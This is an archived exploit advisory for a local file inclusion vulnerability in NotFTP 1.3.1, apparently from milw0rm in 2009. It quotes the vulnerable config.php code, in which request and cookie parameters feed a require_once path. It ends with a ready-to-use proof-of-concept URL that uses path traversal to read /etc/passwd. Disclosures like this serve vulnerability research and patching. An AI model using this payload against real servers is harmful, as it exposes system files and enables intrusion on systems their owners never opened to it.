43 lines
No EOL
925 B
Text
43 lines
No EOL
925 B
Text
NotFTP 1.3.1 => Local file include
|
|
http://sourceforge.net/projects/notftp/
|
|
|
|
|
|
Author: Kacper
|
|
Email: kacper1964@yahoo.pl
|
|
Home: http://devilteam.pl/
|
|
|
|
DC++ Hub address: bluber-hub.no-ip.biz:2008
|
|
|
|
Vuln:
|
|
|
|
File config.php:
|
|
|
|
#########################################################################
|
|
# This is where we decide what language to use. Don't mess with this
|
|
# either.
|
|
#########################################################################
|
|
|
|
if (isset($newlang))
|
|
{
|
|
require_once("lib/lang/".$languages[$newlang]["file"]);
|
|
}
|
|
elseif (isset($_COOKIE["notftplang"]))
|
|
{
|
|
require_once("lib/lang/".$languages[$_COOKIE["notftplang"]]["file"]);
|
|
}
|
|
else
|
|
{
|
|
require_once("lib/lang/".$languages[DEFAULTLANG]["file"]);
|
|
}
|
|
|
|
# NotFTP version. Changing this would be silly. So don't.
|
|
|
|
PoC:
|
|
|
|
http://site.pl/path/config.php?newlang=kacper&languages[kacper][file]=../../../../../etc/passwd
|
|
|
|
The End
|
|
|
|
=========
|
|
|
|
# milw0rm.com [2009-04-21] |